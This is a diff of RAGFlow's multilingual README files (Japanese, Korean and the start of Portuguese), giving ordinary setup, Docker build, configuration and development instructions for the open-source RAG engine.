- [Discord](https://discord.gg/4XxujFgUN7)
+
- [Twitter](https://twitter.com/infiniflowai)
+2. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
-
+   > デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`（ポート番号は省略）だけを入力すればよい。
-## 🙌 コントリビュート
+3. [service_conf.yaml.template](./docker/service_conf.yaml.template) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
-
+
-RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず[コントリビューションガイド](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md)をご覧ください。
+   > 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
   _これで初期設定完了！ショーの開幕です！_
 ## 🔧 コンフィグ
 システムコンフィグに関しては、以下のファイルを管理する必要がある:
 - [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
 - [service_conf.yaml.template](./docker/service_conf.yaml.template): バックエンドのサービスを設定します。
 - [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
 [.env](./docker/.env) ファイルの変更が [service_conf.yaml.template](./docker/service_conf.yaml.template) ファイルの内容と一致していることを確認する必要があります。
 > [./docker/README](./docker/README.md) ファイル ./docker/README には、service_conf.yaml.template ファイルで ${ENV_VARS} として使用できる環境設定とサービス構成の詳細な説明が含まれています。
 デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
 > すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
 >
 > ```bash
 > $ docker compose -f docker-compose.yml up -d
 > ```
 ### Elasticsearch から Infinity にドキュメントエンジンを切り替えます
 RAGFlow はデフォルトで Elasticsearch を使用して全文とベクトルを保存します。［Infinity］に切り替え（https://github.com/infiniflow/infinity/)、次の手順に従います。
 1. 実行中のすべてのコンテナを停止するには：
   ```bash
   $ docker compose -f docker/docker-compose.yml down -v
   ```
   Note: `-v` は docker コンテナのボリュームを削除し、既存のデータをクリアします。
 2. **docker/.env** の「DOC \_ ENGINE」を「infinity」に設定します。
 3. 起動コンテナ：
   ```bash
   $ docker compose -f docker-compose.yml up -d
   ```
   > [!WARNING]
   > Linux/arm64 マシンでの Infinity への切り替えは正式にサポートされていません。
 ## 🔧 ソースコードで Docker イメージを作成（埋め込みモデルなし）
 この Docker イメージのサイズは約 1GB で、外部の大モデルと埋め込みサービスに依存しています。
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
 ```
 ## 🔧 ソースコードをコンパイルした Docker イメージ（埋め込みモデルを含む）
 この Docker のサイズは約 9GB で、埋め込みモデルを含むため、外部の大モデルサービスのみが必要です。
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
 ```
 ## 🔨 ソースコードからサービスを起動する方法
 1. uv をインストールする。すでにインストールされている場合は、このステップをスキップしてください:
   ```bash
   pipx install uv pre-commit
   ```
 2. ソースコードをクローンし、Python の依存関係をインストールする:
   ```bash
   git clone https://github.com/infiniflow/ragflow.git
   cd ragflow/
   uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
   uv run download_deps.py
   pre-commit install
   ```
 3. Docker Compose を使用して依存サービス（MinIO、Elasticsearch、Redis、MySQL）を起動する:
   ```bash
   docker compose -f docker/docker-compose-base.yml up -d
   ```
   `/etc/hosts` に以下の行を追加して、**conf/service_conf.yaml** に指定されたすべてのホストを `127.0.0.1` に解決します:
   ```
   127.0.0.1       es01 infinity mysql minio redis sandbox-executor-manager
   ```
 4. HuggingFace にアクセスできない場合は、`HF_ENDPOINT` 環境変数を設定してミラーサイトを使用してください:
   ```bash
   export HF_ENDPOINT=https://hf-mirror.com
   ```
 5. オペレーティングシステムにjemallocがない場合は、次のようにインストールします:
   ```bash
   # ubuntu
   sudo apt-get install libjemalloc-dev
   # centos
   sudo yum install jemalloc
   ```
 6. バックエンドサービスを起動する:
   ```bash
   source .venv/bin/activate
   export PYTHONPATH=$(pwd)
   bash docker/launch_backend_service.sh
   ```
 7. フロントエンドの依存関係をインストールする:
   ```bash
   cd web
   npm install
   ```
 8. フロントエンドサービスを起動する:
   ```bash
   npm run dev
   ```
   _以下の画面で、システムが正常に起動したことを示します:_
   ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
 9. 開発が完了したら、RAGFlow のフロントエンド サービスとバックエンド サービスを停止します:
   ```bash
   pkill -f "ragflow_server.py|task_executor.py"
   ```
 ## 📚 ドキュメンテーション
 - [Quickstart](https://ragflow.io/docs/dev/)
 - [Configuration](https://ragflow.io/docs/dev/configurations)
 - [Release notes](https://ragflow.io/docs/dev/release_notes)
 - [User guides](https://ragflow.io/docs/dev/category/guides)
 - [Developer guides](https://ragflow.io/docs/dev/category/developers)
 - [References](https://ragflow.io/docs/dev/category/references)
 - [FAQs](https://ragflow.io/docs/dev/faq)
 ## 📜 ロードマップ
 [RAGFlow ロードマップ 2025](https://github.com/infiniflow/ragflow/issues/4214) を参照
 ## 🏄 コミュニティ
 - [Discord](https://discord.gg/NjYzJD3GM3)
 - [Twitter](https://twitter.com/infiniflowai)
 - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
 ## 🙌 コントリビュート
 RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず [コントリビューションガイド](https://ragflow.io/docs/dev/contributing)をご覧ください。
--- a/README_ko.md
+++ b/README_ko.md
@ -0,0 +1,364 @@
 <div align="center">
 <a href="https://demo.ragflow.io/">
 <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
 </a>
 </div>
 <p align="center">
  <a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
  <a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
  <a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
  <a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
  <a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DBEDFA"></a>
  <a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
  <a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
 </p>
 <p align="center">
    <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
        <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
    </a>
    <a href="https://demo.ragflow.io" target="_blank">
        <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
    </a>
    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
        <img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
    </a>
    <a href="https://github.com/infiniflow/ragflow/releases/latest">
        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
    </a>
    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
        <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
    </a>
    <a href="https://deepwiki.com/infiniflow/ragflow">
        <img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
    </a>
 </p>
 <h4 align="center">
  <a href="https://ragflow.io/docs/dev/">Document</a> |
  <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
  <a href="https://twitter.com/infiniflowai">Twitter</a> |
  <a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
  <a href="https://demo.ragflow.io">Demo</a>
 </h4>
 #
 ## 💡 RAGFlow란?
 [RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
 ## 🎮 데모
 데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
 </div>
 ## 🔥 업데이트
 - 2025-08-01 에이전트 워크플로를 지원합니다.
 - 2025-05-23 Agent에 Python/JS 코드 실행기 구성 요소를 추가합니다.
 - 2025-05-05 언어 간 쿼리를 지원합니다.
 - 2025-03-19 PDF 또는 DOCX 파일 내의 이미지를 이해하기 위해 다중 모드 모델을 사용하는 것을 지원합니다.
 - 2025-02-28 인터넷 검색(TAVILY)과 결합되어 모든 LLM에 대한 심층 연구를 지원합니다.
 - 2024-12-18 DeepDoc의 문서 레이아웃 분석 모델 업그레이드.
 - 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
 ## 🎉 계속 지켜봐 주세요
 ⭐️우리의 저장소를 즐겨찾기에 등록하여 흥미로운 새로운 기능과 업데이트를 최신 상태로 유지하세요! 모든 새로운 릴리스에 대한 즉시 알림을 받으세요! 🌟
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
 </div>
 ## 🌟 주요 기능
 ### 🍭 **"Quality in, quality out"**
 - [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
 - 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.
 ### 🍱 **템플릿 기반의 chunking**
 - 똑똑하고 설명 가능한 방식.
 - 다양한 템플릿 옵션을 제공합니다.
 ### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
 - 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
 - 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.
 ### 🍔 **다른 종류의 데이터 소스와의 호환성**
 - 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.
 ### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
 - 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
 - 구성 가능한 LLM 및 임베딩 모델.
 - 다중 검색과 결합된 re-ranking.
 - 비즈니스와 원활하게 통합할 수 있는 직관적인 API.
 ## 🔎 시스템 아키텍처
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
 </div>
 ## 🎬 시작하기
 ### 📝 사전 준비 사항
 - CPU >= 4 cores
 - RAM >= 16 GB
 - Disk >= 50 GB
 - Docker >= 24.0.0 & Docker Compose >= v2.26.1
 - [gVisor](https://gvisor.dev/docs/user_guide/install/): RAGFlow의 코드 실행기(샌드박스) 기능을 사용하려는 경우에만 필요합니다.
 > [!TIP]
 > 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](<(https://docs.docker.com/engine/install/)>)를 참조하세요.
 ### 🚀 서버 시작하기
 1. `vm.max_map_count`가 262144 이상인지 확인하세요:
   > `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
   >
   > ```bash
   > $ sysctl vm.max_map_count
   > ```
   >
   > 만약 `vm.max_map_count` 이 262144 보다 작다면 값을 쟈설정하세요.
   >
   > ```bash
   > # 이 경우에 262144로 설정했습니다.:
   > $ sudo sysctl -w vm.max_map_count=262144
   > ```
   >
   > 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 /etc/sysctl.conf 파일에 vm.max_map_count 값을 추가하거나 업데이트하세요:
   >
   > ```bash
   > vm.max_map_count=262144
   > ```
 2. 레포지토리를 클론하세요:
   ```bash
   $ git clone https://github.com/infiniflow/ragflow.git
   ```
 3. 미리 빌드된 Docker 이미지를 생성하고 서버를 시작하세요:
 > [!CAUTION]
 > 모든 Docker 이미지는 x86 플랫폼을 위해 빌드되었습니다. 우리는 현재 ARM64 플랫폼을 위한 Docker 이미지를 제공하지 않습니다.
 > ARM64 플랫폼을 사용 중이라면, [시스템과 호환되는 Docker 이미지를 빌드하려면 이 가이드를 사용해 주세요](https://ragflow.io/docs/dev/build_docker_image).
   > 아래 명령어는 RAGFlow Docker 이미지의 v0.20.0-slim 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.20.0-slim과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오. 예를 들어, 전체 버전인 v0.20.0을 다운로드하려면 RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0로 설정합니다.
   ```bash
   $ cd ragflow/docker
   # Use CPU for embedding and DeepDoc tasks:
   $ docker compose -f docker-compose.yml up -d
   # To use GPU to accelerate embedding and DeepDoc tasks:
   # docker compose -f docker-compose-gpu.yml up -d
   ```
   | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable?                  |
   | ----------------- | --------------- | --------------------- | ------------------------ |
   | v0.20.0           | &approx;9       | :heavy_check_mark:    | Stable release           |
   | v0.20.0-slim      | &approx;2       | ❌                    | Stable release           |
   | nightly           | &approx;9       | :heavy_check_mark:    | _Unstable_ nightly build |
   | nightly-slim      | &approx;2       | ❌                     | _Unstable_ nightly build |
 1. 서버가 시작된 후 서버 상태를 확인하세요:
   ```bash
   $ docker logs -f ragflow-server
   ```
   _다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_
   ```bash
        ____   ___    ______ ______ __
       / __ \ /   |  / ____// ____// /____  _      __
      / /_/ // /| | / / __ / /_   / // __ \| | /| / /
     / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
    /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/
    * Running on all addresses (0.0.0.0)
   ```
   > 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network anormal` 오류가 발생할 수 있습니다.
 2. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
   > 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
 3. [service_conf.yaml.template](./docker/service_conf.yaml.template) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
   > 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.
   _이제 쇼가 시작됩니다!_
 ## 🔧 설정
 시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:
 - [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
 - [service_conf.yaml.template](./docker/service_conf.yaml.template): 백엔드 서비스를 구성합니다.
 - [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.
 [.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml.template](./docker/service_conf.yaml.template) 파일의 내용과 일치하도록 해야 합니다.
 > [./docker/README](./docker/README.md) 파일 ./docker/README은 service_conf.yaml.template 파일에서 ${ENV_VARS}로 사용할 수 있는 환경 설정과 서비스 구성에 대한 자세한 설명을 제공합니다.
 기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.
 > 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
 >
 > ```bash
 > $ docker compose -f docker-compose.yml up -d
 > ```
 ### Elasticsearch 에서 Infinity 로 문서 엔진 전환
 RAGFlow 는 기본적으로 Elasticsearch 를 사용하여 전체 텍스트 및 벡터를 저장합니다. [Infinity]로 전환(https://github.com/infiniflow/infinity/), 다음 절차를 따르십시오.
 1. 실행 중인 모든 컨테이너를 중지합니다.
   ```bash
   $docker compose-f docker/docker-compose.yml down -v
   ```
   Note: `-v` 는 docker 컨테이너의 볼륨을 삭제하고 기존 데이터를 지우며, 이 작업은 컨테이너를 중지하는 것과 동일합니다.
 2. **docker/.env**의 "DOC_ENGINE" 을 "infinity" 로 설정합니다.
 3. 컨테이너 부팅:
   ```bash
   $docker compose-f docker/docker-compose.yml up -d
   ```
   > [!WARNING]
   > Linux/arm64 시스템에서 Infinity로 전환하는 것은 공식적으로 지원되지 않습니다.
 ## 🔧 소스 코드로 Docker 이미지를 컴파일합니다(임베딩 모델 포함하지 않음)
 이 Docker 이미지의 크기는 약 1GB이며, 외부 대형 모델과 임베딩 서비스에 의존합니다.
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
 ```
 ## 🔧 소스 코드로 Docker 이미지를 컴파일합니다(임베딩 모델 포함)
 이 Docker의 크기는 약 9GB이며, 이미 임베딩 모델을 포함하고 있으므로 외부 대형 모델 서비스에만 의존하면 됩니다.
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
 ```
 ## 🔨 소스 코드로 서비스를 시작합니다.
 1. uv를 설치하거나 이미 설치된 경우 이 단계를 건너뜁니다:
   ```bash
   pipx install uv pre-commit
   ```
 2. 소스 코드를 클론하고 Python 의존성을 설치합니다:
   ```bash
   git clone https://github.com/infiniflow/ragflow.git
   cd ragflow/
   uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
   uv run download_deps.py
   pre-commit install
   ```
 3. Docker Compose를 사용하여 의존 서비스(MinIO, Elasticsearch, Redis 및 MySQL)를 시작합니다:
   ```bash
   docker compose -f docker/docker-compose-base.yml up -d
   ```
   `/etc/hosts` 에 다음 줄을 추가하여 **conf/service_conf.yaml** 에 지정된 모든 호스트를 `127.0.0.1` 로 해결합니다:
   ```
   127.0.0.1       es01 infinity mysql minio redis sandbox-executor-manager
   ```
 4. HuggingFace에 접근할 수 없는 경우, `HF_ENDPOINT` 환경 변수를 설정하여 미러 사이트를 사용하세요:
   ```bash
   export HF_ENDPOINT=https://hf-mirror.com
   ```
 5. 만약 운영 체제에 jemalloc이 없으면 다음 방식으로 설치하세요:
   ```bash
   # ubuntu
   sudo apt-get install libjemalloc-dev
   # centos
   sudo yum install jemalloc
   ```
 6. 백엔드 서비스를 시작합니다:
   ```bash
   source .venv/bin/activate
   export PYTHONPATH=$(pwd)
   bash docker/launch_backend_service.sh
   ```
 7. 프론트엔드 의존성을 설치합니다:
   ```bash
   cd web
   npm install
   ```
 8. 프론트엔드 서비스를 시작합니다:
   ```bash
   npm run dev
   ```
   _다음 인터페이스는 시스템이 성공적으로 시작되었음을 나타냅니다:_
   ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
 9. 개발이 완료된 후 RAGFlow 프론트엔드 및 백엔드 서비스를 중지합니다.
   ```bash
   pkill -f "ragflow_server.py|task_executor.py"
   ```
 ## 📚 문서
 - [Quickstart](https://ragflow.io/docs/dev/)
 - [Configuration](https://ragflow.io/docs/dev/configurations)
 - [Release notes](https://ragflow.io/docs/dev/release_notes)
 - [User guides](https://ragflow.io/docs/dev/category/guides)
 - [Developer guides](https://ragflow.io/docs/dev/category/developers)
 - [References](https://ragflow.io/docs/dev/category/references)
 - [FAQs](https://ragflow.io/docs/dev/faq)
 ## 📜 로드맵
 [RAGFlow 로드맵 2025](https://github.com/infiniflow/ragflow/issues/4214)을 확인하세요.
 ## 🏄 커뮤니티
 - [Discord](https://discord.gg/NjYzJD3GM3)
 - [Twitter](https://twitter.com/infiniflowai)
 - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
 ## 🙌 컨트리뷰션
 RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](https://ragflow.io/docs/dev/contributing)을 검토해 주세요.
--- a/README_pt_br.md
+++ b/README_pt_br.md
@ -0,0 +1,388 @@
 <div align="center">
 <a href="https://demo.ragflow.io/">
 <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
 </a>
 </div>
 <p align="center">
  <a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
  <a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
  <a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
  <a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
  <a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
  <a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
  <a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DBEDFA"></a>
 </p>
 <p align="center">
    <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
        <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="seguir no X(Twitter)">
    </a>
    <a href="https://demo.ragflow.io" target="_blank">
        <img alt="Badge Estático" src="https://img.shields.io/badge/Online-Demo-4e6b99">
    </a>
    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
        <img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
    </a>
    <a href="https://github.com/infiniflow/ragflow/releases/latest">
        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Última%20Relese" alt="Última Versão">
    </a>
    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
        <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="licença">
    </a>
    <a href="https://deepwiki.com/infiniflow/ragflow">
        <img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
    </a>
 </p>
 <h4 align="center">
  <a href="https://ragflow.io/docs/dev/">Documentação</a> |
  <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
  <a href="https://twitter.com/infiniflowai">Twitter</a> |
  <a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
  <a href="https://demo.ragflow.io">Demo</a>
 </h4>
 #
 <details open>
 <summary><b>📕 Índice</b></summary>
 - 💡 [O que é o RAGFlow?](#-o-que-é-o-ragflow)
 - 🎮 [Demo](#-demo)
 - 📌 [Últimas Atualizações](#-últimas-atualizações)
 - 🌟 [Principais Funcionalidades](#-principais-funcionalidades)
 - 🔎 [Arquitetura do Sistema](#-arquitetura-do-sistema)
 - 🎬 [Primeiros Passos](#-primeiros-passos)
 - 🔧 [Configurações](#-configurações)
 - 🔧 [Construir uma imagem docker sem incorporar modelos](#-construir-uma-imagem-docker-sem-incorporar-modelos)
 - 🔧 [Construir uma imagem docker incluindo modelos](#-construir-uma-imagem-docker-incluindo-modelos)
 - 🔨 [Lançar serviço a partir do código-fonte para desenvolvimento](#-lançar-serviço-a-partir-do-código-fonte-para-desenvolvimento)
 - 📚 [Documentação](#-documentação)
 - 📜 [Roadmap](#-roadmap)
 - 🏄 [Comunidade](#-comunidade)
 - 🙌 [Contribuindo](#-contribuindo)
 </details>
 ## 💡 O que é o RAGFlow?
 [RAGFlow](https://ragflow.io/) é um mecanismo RAG (Geração Aumentada por Recuperação) de código aberto baseado em entendimento profundo de documentos. Ele oferece um fluxo de trabalho RAG simplificado para empresas de qualquer porte, combinando LLMs (Modelos de Linguagem de Grande Escala) para fornecer capacidades de perguntas e respostas verídicas, respaldadas por citações bem fundamentadas de diversos dados complexos formatados.
 ## 🎮 Demo
 Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
 </div>
 ## 🔥 Últimas Atualizações
 - 01-08-2025 Suporta o fluxo de trabalho agêntico.
 - 23-05-2025 Adicione o componente executor de código Python/JS ao Agente.
 - 05-05-2025 Suporte a consultas entre idiomas.
 - 19-03-2025 Suporta o uso de um modelo multi-modal para entender imagens dentro de arquivos PDF ou DOCX.
 - 28-02-2025 combinado com a pesquisa na Internet (T AVI LY), suporta pesquisas profundas para qualquer LLM.
 - 18-12-2024 Atualiza o modelo de Análise de Layout de Documentos no DeepDoc.
 - 22-08-2024 Suporta conversão de texto para comandos SQL via RAG.
 ## 🎉 Fique Ligado
 ⭐️ Dê uma estrela no nosso repositório para se manter atualizado com novas funcionalidades e melhorias empolgantes! Receba notificações instantâneas sobre novos lançamentos! 🌟
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
 </div>
 ## 🌟 Principais Funcionalidades
 ### 🍭 **"Qualidade entra, qualidade sai"**
 - Extração de conhecimento baseada em [entendimento profundo de documentos](./deepdoc/README.md) a partir de dados não estruturados com formatos complicados.
 - Encontra a "agulha no palheiro de dados" de literalmente tokens ilimitados.
 ### 🍱 **Fragmentação baseada em templates**
 - Inteligente e explicável.
 - Muitas opções de templates para escolher.
 ### 🌱 **Citações fundamentadas com menos alucinações**
 - Visualização da fragmentação de texto para permitir intervenção humana.
 - Visualização rápida das referências chave e citações rastreáveis para apoiar respostas fundamentadas.
 ### 🍔 **Compatibilidade com fontes de dados heterogêneas**
 - Suporta Word, apresentações, excel, txt, imagens, cópias digitalizadas, dados estruturados, páginas da web e mais.
 ### 🛀 **Fluxo de trabalho RAG automatizado e sem esforço**
 - Orquestração RAG simplificada voltada tanto para negócios pessoais quanto grandes empresas.
 - Modelos LLM e de incorporação configuráveis.
 - Múltiplas recuperações emparelhadas com reclassificação fundida.
 - APIs intuitivas para integração sem problemas com os negócios.
 ## 🔎 Arquitetura do Sistema
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
 </div>
 ## 🎬 Primeiros Passos
 ### 📝 Pré-requisitos
 - CPU >= 4 núcleos
 - RAM >= 16 GB
 - Disco >= 50 GB
 - Docker >= 24.0.0 & Docker Compose >= v2.26.1
 - [gVisor](https://gvisor.dev/docs/user_guide/install/): Necessário apenas se você pretende usar o recurso de executor de código (sandbox) do RAGFlow.
 > [!TIP]
 > Se você não instalou o Docker na sua máquina local (Windows, Mac ou Linux), veja [Instalar Docker Engine](https://docs.docker.com/engine/install/).
 ### 🚀 Iniciar o servidor
 1.  Certifique-se de que `vm.max_map_count` >= 262144:
    > Para verificar o valor de `vm.max_map_count`:
    >
    > ```bash
    > $ sysctl vm.max_map_count
    > ```
    >
    > Se necessário, redefina `vm.max_map_count` para um valor de pelo menos 262144:
    >
    > ```bash
    > # Neste caso, defina para 262144:
    > $ sudo sysctl -w vm.max_map_count=262144
    > ```
    >
    > Essa mudança será resetada após a reinicialização do sistema. Para garantir que a alteração permaneça permanente, adicione ou atualize o valor de `vm.max_map_count` em **/etc/sysctl.conf**:
    >
    > ```bash
    > vm.max_map_count=262144
    > ```
 2.  Clone o repositório:
    ```bash
    $ git clone https://github.com/infiniflow/ragflow.git
    ```
 3.  Inicie o servidor usando as imagens Docker pré-compiladas:
 > [!CAUTION]
 > Todas as imagens Docker são construídas para plataformas x86. Atualmente, não oferecemos imagens Docker para ARM64.
 > Se você estiver usando uma plataforma ARM64, por favor, utilize [este guia](https://ragflow.io/docs/dev/build_docker_image) para construir uma imagem Docker compatível com o seu sistema.
